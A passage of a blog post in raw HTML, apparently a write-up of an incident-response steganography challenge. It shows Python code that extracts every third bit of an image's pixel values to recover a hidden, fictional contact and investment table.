src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAlEpTCliprLqUaYvkxwS3fhCKDXWfohtg8JBzJp8tSJTAAn9QQTc6dQ__cNHeh3hrO7e0jo1D3BP9YFa-GgIdsoEE8urFYZTHwlzs-Fn_gywZbnSAJargluzj8Wuu0IzSyRhNkWaUV57M_LTQx5BE92eB2KeTdVqRkHCMg_d5xcXko4cY2VON82JPNZM/w640-h390/Recover%20Extracted%20my%20notes%20file.PNG" width="640" /></a></div></div><div><br /></div><div><br /></div><div>We also see "<i>vessel.png</i>". When this is extracted, we get:</div><div><br /></div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg01S7yGfLYYdugULg-2lDiXWC7lUuWwFaMkMwdvFIBhylH-1-gGbYLgEoOMOYR6TSPeeEkqaNVPWkOxZ61x-Bftbcp2IyXtWq4ONgBES0Y3xeeIA_9OfLIrhMRalNzBBoYcppFveAKaLQaPpcNg1MV1PkOHPjd5vlodOY3kdOhDgochDtGS2AzlpJ-S2M/s963/Hidden%20Image%20-%20friends.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="699" data-original-width="963" height="464" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg01S7yGfLYYdugULg-2lDiXWC7lUuWwFaMkMwdvFIBhylH-1-gGbYLgEoOMOYR6TSPeeEkqaNVPWkOxZ61x-Bftbcp2IyXtWq4ONgBES0Y3xeeIA_9OfLIrhMRalNzBBoYcppFveAKaLQaPpcNg1MV1PkOHPjd5vlodOY3kdOhDgochDtGS2AzlpJ-S2M/w640-h464/Hidden%20Image%20-%20friends.PNG" width="640" /></a></div></div><div><br /></div><div><br /></div><div>We also see what looks like an alternate data stream via <i>vessel.png:hidden</i>.<br /><br /></div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPeYzziBFSBATGxq6pCe9EbK4hvdnp6_fnMsrVenGUQyfbEM9UMZQavwUsNYGShRryhoS-caPXtjIhmtp0D-SndxswgKQHaGJqoptmW2SOkM0qWZAsPBxqt78k7_0F5ofvG4nWdW_Z6iH_TGVQ4nBwSZbeagflHTOPrlaqHAHa_xy96InK1K7XdpH24Ic/s1110/rar%20file%20in%20ads%20-%20extracted..PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="701" data-original-width="1110" height="404" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPeYzziBFSBATGxq6pCe9EbK4hvdnp6_fnMsrVenGUQyfbEM9UMZQavwUsNYGShRryhoS-caPXtjIhmtp0D-SndxswgKQHaGJqoptmW2SOkM0qWZAsPBxqt78k7_0F5ofvG4nWdW_Z6iH_TGVQ4nBwSZbeagflHTOPrlaqHAHa_xy96InK1K7XdpH24Ic/w640-h404/rar%20file%20in%20ads%20-%20extracted..PNG" width="640" /></a></div></div><div><br /></div><div>Extracted the file and attempt to identify that Alternate Data Stream is being used:</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">C:\Users\securitynik\Documents>dir vessel.png_hidden /R</span>
<span style="color: white;"> Volume in drive C has no label.</span>
<span style="color: white;"> Volume Serial Number is 9A7A-30CD</span>
<span style="color: white;"> Directory of C:\Users\securitynik\Documents</span>
<span style="color: white;">07/29/2023 12:06 PM 398 vessel.png_hidden</span>
<span style="color: white;"> 1 File(s) 398 bytes</span>
<span style="color: white;"> 0 Dir(s) 46,440,538,112 bytes free</span>
</pre></div>
</div><div><br /></div><div><div>This does not seem to be using Alternate Data Stream. However, we did see it was a <i>.RAR</i> file from the image above. Leveraging 7zip to open this file.</div><div><br /></div><div>When I opened the file with 7zip it asked for a password. Time to take advantage of the credentials which were found earlier "<i>r3c0v3r1ng_d3l3t3d_d4t4_1s_fun</i>". Hey Jean, couldn't you have chosen an easier password?! Guess you wanted to ensure no one was able to easily guess the password. Good job!</div><div><br /></div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0BqvB1RuXXPNfH1Tj3jTZc3d6Ul_GNt-QW0EHiC8qJI68USDZlWhEgSFk4Ro2d5_hjSIITemU0AybEldcxaP6H7jpaegXRzB_j5OAVia4M7h2NGvDzBkaQKVSbiiTfYdWUg1IJZaiEw3L8URX2yABrVEZTIUDCxOHOFwda6eNoBGJjbtyIMgdo-pphyc/s701/7-zip%20open%20file%20with%20found%20password.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="457" data-original-width="701" height="418" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0BqvB1RuXXPNfH1Tj3jTZc3d6Ul_GNt-QW0EHiC8qJI68USDZlWhEgSFk4Ro2d5_hjSIITemU0AybEldcxaP6H7jpaegXRzB_j5OAVia4M7h2NGvDzBkaQKVSbiiTfYdWUg1IJZaiEw3L8URX2yABrVEZTIUDCxOHOFwda6eNoBGJjbtyIMgdo-pphyc/w640-h418/7-zip%20open%20file%20with%20found%20password.PNG" width="640" /></a></div><br /></div><div><br /></div><div>This created a file named "<i>instructions.txt</i>", with the following context.</div><div><br /></div><div>"<i><b>Hello ! I am glad you got my message :) So the data from that pesky Jerry and his friends is inside the image and should be 629 bytes long. Remember, every 3 bits is where it's at!</b></i>"</div><div><br /></div><div>Guess this means I have to revisit the image. </div><div><br /></div><div><br /></div><div><span style="font-size: large;"><b>Code to recover the message</b></span></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"># Read the file containing the image</span>
<span style="color: white;">fp = open(file=r'c:/tmp/hidden.png', mode='rb')</span>
<span style="color: white;"># Convert the raw bytes to hex</span>
<span style="color: white;">raw_bytes = fp.read().hex(sep=' ', bytes_per_sep=1).split(' ')</span>
<span style="color: white;"># Close the file</span>
<span style="color: white;">fp.close()</span>
<span style="color: white;"># View the length of the file to ensure it is the same as the size on disk</span>
<span style="color: white;">print(len(raw_bytes))</span>
</pre></div>
</div><div><br /></div><div><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">557903</span></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"># Get a view of some of the raw bytes</span>
<span style="color: white;">raw_bytes[:10]</span>
</pre></div>
</div><div><br /></div><div><div class="cell_container" id="31e132f4-f105-4dbf-9dfe-b1329c911466" style="color: #cccccc; font-family: "Segoe WPC", "Segoe UI", sans-serif; font-size: 13px; outline: 0px; position: absolute; top: 5961px; width: 1392px;"><div class="output_container" style="height: 43px; max-height: 43px; overflow: hidden; position: absolute; top: 92px; width: 1392px;"><div class="output remove-padding" id="63b05fdb-8ab7-43a5-84a7-41947fb1680b" style="border-top: none; box-sizing: border-box; font-size: var(--notebook-cell-output-font-size); left: 0px; margin-left: var(--notebook-output-left-margin); overflow-x: auto; padding-bottom: var(--notebook-output-node-padding); padding-left: 0px; padding-right: 0px; padding-top: var(--notebook-output-node-padding); position: absolute; top: 0px; width: var(--notebook-output-width);"><div class="output-plaintext" style="border-color: var(--theme-input-focus-border-color); border-style: solid; border-width: 1px; box-sizing: border-box; cursor: auto; display: inline-block; font-family: var(--notebook-cell-output-font-family); font-size: var(--notebook-cell-output-font-size); line-height: var(--notebook-cell-output-line-height); outline: 0px; overflow-wrap: break-word; padding-left: var(--notebook-output-node-left-padding); padding-right: var(--notebook-output-node-padding); user-select: text; white-space: pre; width: 1332px;" tabindex="0"><span>['89', '50', '4e', '47', '0d', '0a', '1a', '0a', '00', '00']</span></div></div></div></div><div id="focus-sink-31e132f4-f105-4dbf-9dfe-b1329c911466" style="color: #cccccc; font-family: "Segoe WPC", "Segoe UI", sans-serif; font-size: 13px;" tabindex="0"></div><div id="focus-sink-201797f1-0f7f-4be2-bde2-89ce358f3c6c" style="color: #cccccc; font-family: "Segoe WPC", "Segoe UI", sans-serif; font-size: 13px;" tabindex="0"></div><div class="cell_container" id="201797f1-0f7f-4be2-bde2-89ce358f3c6c" style="color: #cccccc; font-family: "Segoe WPC", "Segoe UI", sans-serif; font-size: 13px; outline: 0px; position: absolute; top: 6374px; width: 1392px;"><div class="output_container" style="height: 42px; max-height: 42px; overflow: hidden; position: absolute; top: 116px; width: 1392px;"><div class="output remove-padding output-stream" id="fc53f105-7300-41a3-8e14-8b9ccf37bb9f" style="border-top: none; box-sizing: border-box; cursor: auto; display: inline-block; font-family: var(--notebook-cell-output-font-family); font-size: var(--notebook-cell-output-font-size); left: 0px; line-height: var(--notebook-cell-output-line-height); margin-left: var(--notebook-output-left-margin); overflow-wrap: break-word; overflow-x: auto; padding-bottom: var(--notebook-output-node-padding); padding-left: 0px; padding-right: 0px; padding-top: var(--notebook-output-node-padding); position: absolute; top: 0px; user-select: text; white-space: pre; width: var(--notebook-output-width);"><div style="border-color: transparent; border-style: solid; border-width: 1px; box-sizing: border-box; padding-left: var(--notebook-output-node-left-padding); padding-right: var(--notebook-output-node-padding);" tabindex="0"></div></div></div></div></div><div><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">['89', '50', '4e', '47', '0d', '0a', '1a', '0a', '00', '00']</span></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"># Convert the raw bytes to a list of bits</span>
<span style="color: white;">int_list = [ int(byte, 16) for byte in raw_bytes ]</span>
<span style="color: white;"># Get a snapshot</span>
<span style="color: white;">print(int_list[:10])</span>
</pre></div>
</div><div><br /></div><div><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">[137, 80, 78, 71, 13, 10, 26, 10, 0, 0]</span></div><div><br /></div><div><div class="cell_container" id="31e132f4-f105-4dbf-9dfe-b1329c911466" style="color: #cccccc; font-family: "Segoe WPC", "Segoe UI", sans-serif; font-size: 13px; outline: 0px; position: absolute; top: 5961px; width: 1392px;"><div class="output_container" style="height: 43px; max-height: 43px; overflow: hidden; position: absolute; top: 92px; width: 1392px;"><div class="output remove-padding" id="63b05fdb-8ab7-43a5-84a7-41947fb1680b" style="border-top: none; box-sizing: border-box; font-size: var(--notebook-cell-output-font-size); left: 0px; margin-left: var(--notebook-output-left-margin); overflow-x: auto; padding-bottom: var(--notebook-output-node-padding); padding-left: 0px; padding-right: 0px; padding-top: var(--notebook-output-node-padding); position: absolute; top: 0px; width: var(--notebook-output-width);"><br /></div></div></div></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"># Convert those numbers to bits</span>
<span style="color: white;">bit_list = bit_list = [ format(item, '0>8b') for item in int_list ]</span>
<span style="color: white;">print(bit_list[:10])</span>
</pre></div>
</div><div><br /></div><div><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">['10001001', '01010000', '01001110', '01000111', '00001101', '00001010', '00011010', '00001010', '00000000', '00000000']</span></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"># Condense the bit list to smash it all together</span>
<span style="color: white;">bits_condensed = ''.join(bit_list)</span>
<span style="color: white;"># Get the first 100 bits</span>
<span style="color: white;">bits_condensed[:100]</span>
</pre></div>
</div><div><br /><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">'1000100101010000010011100100011100001101000010100001101000001010000000000000000000000000000011010100'</span></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"># Now extract every third bit</span>
<span style="color: white;">#bits_by_3 = bits_condensed[::3]</span>
<span style="color: white;">#bits_by_3</span>
<span style="color: white;">bits_at_3 = []</span>
<span style="color: white;">index = 0</span>
<span style="color: white;">for i, value in enumerate(bits_condensed):</span>
<span style="color: white;"> if index <= len(bits_condensed)-10:</span>
<span style="color: white;"> index += 3</span>
<span style="color: white;"> #print(index, bits_condensed[index-1])</span>
<span style="color: white;"> bits_at_3.append(bits_condensed[index-1])</span>
<span style="color: white;"># Get the first 100 bits</span>
<span style="color: white;">print(bits_at_3[:25])</span>
</pre></div>
</div><div><br /></div><div><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">['0', '0', '0', '1', '0', '1', '1', '0', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0']</span></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"># Condensed the bits</span>
<span style="color: white;">bits_at_3_condensed = ''.join(bits_at_3)</span>
<span style="color: white;"># Get the first 100 bits</span>
<span style="color: white;">bits_at_3_condensed[:100]</span>
</pre></div>
</div><div><br /></div><div><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">'0001011001000010000010000000001100000100000000000100000000000000000000000000000000100010000000000001'</span></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"># Get the bits expanded to recreate the bytes</span>
<span style="color: white;">bits_expanded = [ bits_at_3_condensed [i:i+8] for i in range(0, len(bits_at_3_condensed), 8) ]</span>
<span style="color: white;"># Get the first 100 bits</span>
<span style="color: white;">print(bits_expanded[:10])</span>
</pre></div>
</div><div><br /></div><div><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">['00010110', '01000010', '00001000', '00000011', '00000100', '00000000', '01000000', '00000000', '00000000', '00000000']</span></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"># Convert the bits to int values</span>
<span style="color: white;"># https://stackoverflow.com/questions/58016378/is-there-a-way-to-convert-bit-to-int</span>
<span style="color: white;">bits_to_int = [ chr(int(value, 2)) for value in bits_expanded ]</span>
<span style="color: white;"># Get the first 100 bits</span>
<span style="color: white;">print(bits_to_int[:10])</span>
</pre></div>
</div><div><br /></div><div><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">['\x16', 'B', '\x08', '\x03', '\x04', '\x00', '@', '\x00', '\x00', '\x00']</span></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"># Get the final bytes</span>
<span style="color: white;">final_bytes = bytes(' '.join(bits_to_int), encoding='utf-8')</span>
<span style="color: white;">final_bytes[:30], len(final_bytes)</span>
</pre></div>
</div><div><br /></div><div><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">(b'\x16 B \x08 \x03 \x04 \x00 @ \x00 \x00 \x00 " \x00 \x1c \x12 \xc3\x8f',
</span><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;"> 464930)</span></div><div><br />The above returned 464930 bytes. I know the note stated it is 629 bytes. So the expectation would be to extract the first 629 bytes from above. I did not go this route. </div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"># Convert these values to hex</span>
<span style="color: white;">final_bytes.hex(sep=' ', bytes_per_sep=1)</span>
</pre></div>
</div><div><br /></div><div><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">'16 20 42 20 08 20 03 20 04 20 00 20 40 20 00 20 00 20 00 20 ...</span></div><div><br /></div><div>Above shows the bytes. </div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"># Write these bytes out to a file</span>
<span style="color: white;">fp = open(file=r'c:/tmp/3bits.txt', mode='wb')</span>
<span style="color: white;">fp.write(final_bytes)</span>
<span style="color: white;">fp.close()</span>
</pre></div>
</div><div><br /></div><div><br /></div><div>It is sad to say but after extracting the third bit and putting every thing together, I was not able to recover the message. Time to reach out to Jean, to understand where I went wrong.</div><div><br /></div><div><div>After reaching out to Jean for clarity/hint on what the ask really is, he mentioned in setting up the challenge, he focused on the pixel value. Interestingly, this is the one area that seems to have caused many folks to question their analysis. It is the one area we provided the most hints.</div><div><br /></div><div>Changing my approach.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">from PIL import Image</span>
<span style="color: white;">import numpy as np</span>
</pre></div>
</div><div><br /></div><div>Look at the image pixels from the perspective of Numpy matrix.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">img_pixels_vals = np.array(Image.open(fp=r'c:/tmp/hidden.png'))</span>
<span style="color: white;">img_pixels_vals</span>
</pre></div>
</div><div><br /></div><div><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">array([[213, 231, 181, ..., 209, 231, 245],
</span><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;"> [209, 231, 245, ..., 245, 245, 245],
</span><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;"> [245, 245, 245, ..., 245, 245, 245],
</span><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;"> ...,
</span><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;"> [ 28, 28, 28, ..., 224, 224, 224],
</span><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;"> [ 32, 32, 32, ..., 224, 224, 224],
</span><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;"> [ 42, 42, 42, ..., 224, 224, 224]], dtype=uint8)</span></div><div><br /></div><div>Get the shape of this array.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">img_pixels_vals.shape</span>
</pre></div>
</div><div><br /></div><div><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">(1024, 1536)</span></div><div><br /></div><div>Let's flatten the matrix above and squeeze the dimensions. Squeezing brings it down to 1 dimension. At the same time, print the length of the flatten array. </div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;"># Let's flatten the matrix above and squeeze the dimensions
# Squeezing brings it down to 1 dimension
img_pixels_flat = img_pixels_vals.reshape(1, -1).squeeze()
# Print out the bytes and get the length of the flatten pixel
img_pixels_flat, len(img_pixels_flat)</span></pre></div></div></div><div><br /></div><div><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">(array([213, 231, 181, ..., 224, 224, 224], dtype=uint8), 1572864)</span></div><div><br /></div><div><div>Get these pixel values as bits. Print the first 100 bits or 3 bytes</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"># Get these pixel values as bits</span>
<span style="color: white;">pixel_bits = ''.join([ format(pixel, '>08b') for pixel in img_pixels_flat ])</span>
<span style="color: white;"># Print the first 100 bits or 3 bytes</span>
<span style="color: white;">pixel_bits[:24]</span>
</pre></div>
</div><div><br /></div><div><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">'110101011110011110110101'</span></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"># Extract every 3 bits again.</span>
<span style="color: white;">pixel_bits_at_3 = []</span>
<span style="color: white;">index = 0</span>
<span style="color: white;">for i, value in enumerate(pixel_bits):</span>
<span style="color: white;"> if index <= len(pixel_bits)-10:</span>
<span style="color: white;"> index += 3</span>
<span style="color: white;"> pixel_bits_at_3.append(pixel_bits[index-1])</span>
<span style="color: white;"># Get the first 25 bits</span>
<span style="color: white;">print(pixel_bits_at_3[:16])</span>
</pre></div>
</div><div><br /></div><div><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">['0', '1', '1', '0', '1', '0', '0', '1', '0', '1', '1', '0', '0', '1', '0', '0']</span></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"># Condensed the bits once again </span>
<span style="color: white;">pixel_at_3_condensed = ''.join(pixel_bits_at_3)</span>
<span style="color: white;"># Print the first 24</span>
<span style="color: white;">pixel_at_3_condensed[:24]</span>
</pre></div>
</div><div><br /></div><div><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">'011010010110010000100000'</span></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"># Get the bits expanded to recreate the bytes</span>
<span style="color: white;">pixel_bits_expanded = [ pixel_at_3_condensed[i:i+8] for i in range(0, len(pixel_at_3_condensed), 8) ]</span>
<span style="color: white;"># Get the first 24 bits / 3 bytes</span>
<span style="color: white;">print(pixel_bits_expanded[:3])</span>
</pre></div>
</div><div><br /></div><div><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">['01101001', '01100100', '00100000']</span></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"># Print the first 629 bytes as the hint suggested</span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">print(''.join([ chr(int(value, 2)) for value in pixel_bits_expanded ])[:629])</span></pre></div>
</div><div><br /></div><div><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">id : 1
</span><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">Name : Peterman Catalog
</span><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">Phone : 6479991234
</span><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">PrimaryContact : Jacopo Peterman
</span><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">Email : contact@peterman.com
</span><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">
</span><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">id : 2
</span><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">Name : Yankee Stadium
</span><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">Phone : 6478881234
</span><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">PrimaryContact : George SteinBrenner
</span><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">Email : contact@yankees.com
</span><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">
</span><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">id : 3
</span><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">Name : Vandalay Industries
</span><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">Phone : 6477771234
</span><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">PrimaryContact : Art Vandalay
</span><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">Email : contact@vandalay.com
</span><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">
</span><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">id investment_amount company_secret
</span><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">-- ----------------- --------------
</span><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;"> 1 150000 dogcatalog
</span><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;"> 2 320000 secondteam
</span><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;"> 3 69000 sunumbrellas</span></div><div><br /></div><div><br /></div><div>That's the end! I find this to be a very exciting challenge as it covered many areas of Incident Response.</div><div><br /></div><div>My <a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/Nik's%20Response%20to%20Jean's%20Stego%20Challenge.ipynb" target="_blank">Jupyter Notebook</a> for this decoding can be found on my GitHub.</div><div><br /></div><div><br /></div><div>References:</div><div><a href="https://stackoverflow.com/questions/34412754/trying-to-remove-non-printable-characters-junk-values-from-a-unix-file">https://stackoverflow.com/questions/34412754/trying-to-remove-non-printable-characters-junk-values-from-a-unix-file</a></div><div><a href="https://www.man7.org/linux/man-pages/man1/tr.1.html">https://www.man7.org/linux/man-pages/man1/tr.1.html</a></div><div><a href="https://github.com/mikefara">https://github.com/mikefara</a></div><div><a href="https://learn.microsoft.com/en-us/sql/t-sql/functions/suser-sname-transact-sql?view=sql-server-ver16">https://learn.microsoft.com/en-us/sql/t-sql/functions/suser-sname-transact-sql?view=sql-server-ver16</a></div><div><a href="https://theserogroup.com/sql-server/whos-the-sql-server-database-owner-and-how-can-you-change-it/">https://theserogroup.com/sql-server/whos-the-sql-server-database-owner-and-how-can-you-change-it/</a></div><div><a 